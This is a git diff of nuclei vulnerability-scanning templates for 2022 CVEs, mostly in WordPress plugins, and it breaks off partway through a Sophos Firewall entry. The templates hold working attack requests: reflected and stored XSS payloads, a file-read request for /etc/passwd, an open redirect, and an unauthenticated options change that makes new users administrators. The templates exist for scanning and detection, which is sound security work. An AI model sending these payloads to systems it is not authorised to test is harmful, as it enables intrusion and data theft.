https://nvd.nist.gov/vuln/detail/cve-2022-0140 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0140 + cwe-id: CWE-306 + epss-score: 0.00966 + epss-percentile: 0.8297 + cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: vfbpro + product: visual_form_builder + framework: wordpress + tags: cve,cve2022,wpscan,xss,wordpress,vfbpro + +http: + - raw: + - | + POST /wp-admin/admin.php?page=vfb-export HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}}/wp-admin/admin.php?page=vfb-export + Content-Type: application/x-www-form-urlencoded + Origin: {{RootURL}} + + vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File + + matchers-condition: and + matchers: + - type: word + words: + - '"Date Submitted"' + - '"Entries ID"' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a004730450220555e72b8a7ce8ba848bc013ba68905a0892db7854b4d5a487b4b342d5595b0cf0221009227b34829104b03a2a178ba1afc5c13f05c4db7f63a5971c34a3a95685fa9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0148.yaml b/nuclei-templates/CVE-2022/cve-2022-0148.yaml new file mode 100644 index 0000000000..ae65b6dbeb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0148.yaml @@ -0,0 +1,62 @@ +id: CVE-2022-0148 + +info: + name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148 + - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements + - https://nvd.nist.gov/vuln/detail/CVE-2022-0148 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0148 + cwe-id: CWE-79 + epss-score: 0.00144 + epss-percentile: 0.50222 + cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: premio + product: mystickyelements + framework: wordpress + tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b170ba0c6ad3af42bd6f70aa404652b0e6a8213f3e4f81a152225e137fb949fa022042b2e76073edf8be64e0c79747b2e2791f3b6172349bdfc3bce8a1420a03fbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0149.yaml b/nuclei-templates/CVE-2022/cve-2022-0149.yaml deleted file mode 100644 index ef415ad101..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0149.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-0149 - -info: - name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. - reference: - - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c - - https://nvd.nist.gov/vuln/detail/CVE-2022-0149 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2022-0149 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml deleted file mode 100644 index 9c67da252a..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0165.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2022-0165 - -info: - name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect - author: akincibor - severity: high - description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). - reference: - - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb - - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2022-0165 - cwe-id: CWE-601 - tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0201.yaml rename to nuclei-templates/CVE-2022/cve-2022-0201.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0208.yaml b/nuclei-templates/CVE-2022/cve-2022-0208.yaml index 29da10141b..b9f0a551d6 100644 --- a/nuclei-templates/CVE-2022/cve-2022-0208.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-0208.yaml @@ -6,27 +6,37 @@ info: severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mappresspro + product: mappress + framework: wordpress + tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro -requests: +http: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: @@ -39,4 +49,7 @@ requests: - "Bad mapid" condition: and -# Enhanced by mp on 2022/09/08 + - type: status + status: + - 200 +# digest: 4b0a00483046022100b22a13c10631b7349f4edafe8cde23c314f46cc6c3661afdbef2141c2f9cab67022100adfeec912a26c02a2ba1982ccd3dddb34fab524142068da9e659428a5efd7e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0271.yaml b/nuclei-templates/CVE-2022/cve-2022-0271.yaml new file mode 100644 index 0000000000..825e258e1e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0271.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-0271 + +info: + name: LearnPress <4.1.6 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271 + - https://nvd.nist.gov/vuln/detail/cve-2022-0271 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0271 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: thimpress + product: learnpress + framework: wordpress + tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"dismissed":"xxx"}' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a0047304502207bcdd80813e3bb53a903169393ab76e55fd5ac3e02acff9fa2d8067ad6ab297b0221008bb18cbaef7d28bf2c5b4aa93fbccaded6af697a281db594c73f1fd6b0b28f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0281.yaml b/nuclei-templates/CVE-2022/cve-2022-0281.yaml new file mode 100644 index 0000000000..d8722dcaad --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0281.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-0281 + +info: + name: Microweber Information Disclosure + author: pikpikcu + severity: high + description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + impact: | + Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information. + remediation: | + Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 + - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 + - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0281 + cwe-id: CWE-200 + epss-score: 0.0049 + epss-percentile: 0.73618 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,disclosure,huntr + +http: + - method: GET + path: + - "{{BaseURL}}/api/users/search_authors" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"email":' + - '"display_name":' + condition: and + + - type: status + status: + - 200 +# digest: 490a004630440220552d3cc2790a8fb8ada853011b816e67b148be6db2063639e9518d3ebcae1762022011a0940c35ce73be7f6d5ce093eadb2afbdfc00dd05d86f7da12af5bff26c926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0346.yaml b/nuclei-templates/CVE-2022/cve-2022-0346.yaml index 30d405b5e9..709d25d12b 100644 --- a/nuclei-templates/CVE-2022/cve-2022-0346.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-0346.yaml @@ -6,27 +6,39 @@ info: severity: medium description: | WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code on the affected system or inject malicious scripts into web pages viewed by users. + remediation: | + Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities. reference: - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6 - https://wordpress.org/plugins/www-xml-sitemap-generator-org/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0346 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0346 cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36353 + cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org + verified: true + max-request: 2 + vendor: xmlsitemapgenerator + product: xml_sitemap_generator + framework: wordpress + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator -requests: +http: - method: GET path: - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp' - '{{BaseURL}}/?p=1&xsg-provider=data://text/html, -----------------------------92633278134516118923780781161-- - - | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "alert(document.domain)")' - 'status_code_2 == 200' condition: and - -# Enhanced by md on 2022/09/08 +# digest: 490a0046304402200bfd837680f36e8110d8eef44bd96b117d17b66466691a831f6465ce55cbfa74022069141b6a4dcc45bebefa8074faac3b961b8bfb9dd121151c45865473254fbde3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0599.yaml b/nuclei-templates/CVE-2022/cve-2022-0599.yaml deleted file mode 100644 index b1a73d1aa8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0599.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-0599 - -info: - name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting - author: scent2d - severity: medium - description: | - WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. - reference: - - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ - - https://nvd.nist.gov/vuln/detail/cve-2022-0599 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0599 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'id="mmursp_id" value="\">" />' - - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - condition: and - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0653.yaml b/nuclei-templates/CVE-2022/cve-2022-0653.yaml new file mode 100644 index 0000000000..93b3090e9e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0653.yaml @@ -0,0 +1,53 @@ +id: CVE-2022-0653 + +info: + name: Wordpress Profile Builder Plugin Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: | + The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: Upgrade to version 3.6.5 or later. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 + - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0653 + cwe-id: CWE-79 + epss-score: 0.00206 + epss-percentile: 0.58596 + cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: cozmoslabs + product: profile_builder + framework: wordpress + tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'here' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a0048304602210091b62172c9f552ed6b838c32d0fb253af0500b6380039c00927350af13bd4588022100d74ef37424d0bda0c76c16f24087248e86e5e647e5a6a80879391bd635f0a0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0656.yaml b/nuclei-templates/CVE-2022/cve-2022-0656.yaml new file mode 100644 index 0000000000..62d781c125 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0656.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-0656 + +info: + name: uDraw <3.3.3 - Local File Inclusion + author: akincibor + severity: high + description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc). + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0656 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0656 + cwe-id: CWE-552 + epss-score: 0.00684 + epss-percentile: 0.77939 + cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: webtoprint + product: web_to_print_shop\ + google-query: inurl:"/wp-content/plugins/udraw" + tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + action=udraw_convert_url_to_base64&url=/etc/passwd + + matchers-condition: and + matchers: + - type: word + words: + - "cm9vd" # root in base64 + - "data:image\\/;base64" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e1754a9ee9845d4b7fff44b3fa86b0f357226bfe6c8e1a2188eec44df0349cc6022100821681fd1c6b34cb907739069bef0ac84c01aefb733c8bda81ee38300e2520d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0660.yaml b/nuclei-templates/CVE-2022/cve-2022-0660.yaml index 9cdc808f6e..03acf180ab 100644 --- a/nuclei-templates/CVE-2022/cve-2022-0660.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-0660.yaml @@ -1,26 +1,37 @@ id: CVE-2022-0660 info: - name: Microweber < 1.2.11 - Information Disclosure + name: Microweber <1.2.11 - Information Disclosure author: amit-jd severity: high description: | - Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11. + Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability. reference: - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ - https://github.com/advisories/GHSA-hhrj-wp42-32v3 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 + - https://github.com/microweber/microweber/commit/2417bd2eda2aa2868c1dad1abf62341f22bfc20a classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-0660 cwe-id: CWE-209 + epss-score: 0.00719 + epss-percentile: 0.78502 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve2022,microweber,disclosure,authenticated,huntr,cve + verified: true + max-request: 2 + vendor: microweber + product: microweber + tags: cve,cve2022,microweber,disclosure,authenticated,huntr -requests: +http: - raw: - | POST /api/user_login HTTP/1.1 @@ -28,7 +39,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /module/ HTTP/1.1 Host: {{Hostname}} @@ -37,14 +47,13 @@ requests: class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - contains(body_2,'QueryException') - contains(body_2,'SQLSTATE') - contains(body_2,'runQueryCallback') - - 'contains(all_headers_2,"text/html")' + - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and +# digest: 490a00463044022006a6184e06a8bb2508ed86a39022ab8f8c89e52a6ee6b736be84fd8c1f355090022005d2a535f86a1e140b49cf1e94f2d5e08b7016c64e11b0a5ae67908a74aa59d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0952.yaml b/nuclei-templates/CVE-2022/cve-2022-0952.yaml deleted file mode 100644 index c51d27c117..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0952.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2022-0952 - -info: - name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update - author: random-robbie - severity: high - description: | - The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin - reference: - - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-0952 - cwe-id: CWE-862 - metadata: - verified: "true" - tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress - -requests: - - raw: - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"1"} - - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"default_role":"administrator"} - - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"0"} - - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(all_headers, "application/json")' - - "status_code == 200" - - "contains(body_1, 'users_can_register')" - - "contains(body_2, 'default_role')" - condition: and diff --git a/nuclei-templates/CVE-2022/cve-2022-0963.yaml b/nuclei-templates/CVE-2022/cve-2022-0963.yaml deleted file mode 100644 index 5a03cfe931..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0963.yaml +++ /dev/null @@ -1,71 +0,0 @@ -id: CVE-2022-0963 - -info: - name: Microweber <1.2.12 - Stored Cross-Site Scripting - author: amit-jd - severity: medium - description: | - Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,. - reference: - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ - - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c - - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0963 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /plupload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 - Referer: {{BaseURL}}admin/view:modules/load_module:files - - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="name" - - {{randstr}}.xml - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunk" - - 0 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunks" - - 1 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="file"; filename="blob" - Content-Type: application/octet-stream - - alert(document.domain) - -----------------------------59866212126262636974202255034-- - - - | - GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'contains(body_3,"alert(document.domain)")' - - 'status_code_3==200' - - 'contains(body_2,"bytes_uploaded")' - condition: and - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1020.yaml b/nuclei-templates/CVE-2022/cve-2022-1020.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-1020.yaml rename to nuclei-templates/CVE-2022/cve-2022-1020.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-1040.yaml b/nuclei-templates/CVE-2022/cve-2022-1040.yaml new file mode 100644 index 0000000000..e304c7bb7c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1040.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-1040 + +info: + name: Sophos Firewall <=18.5 MR3 - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected 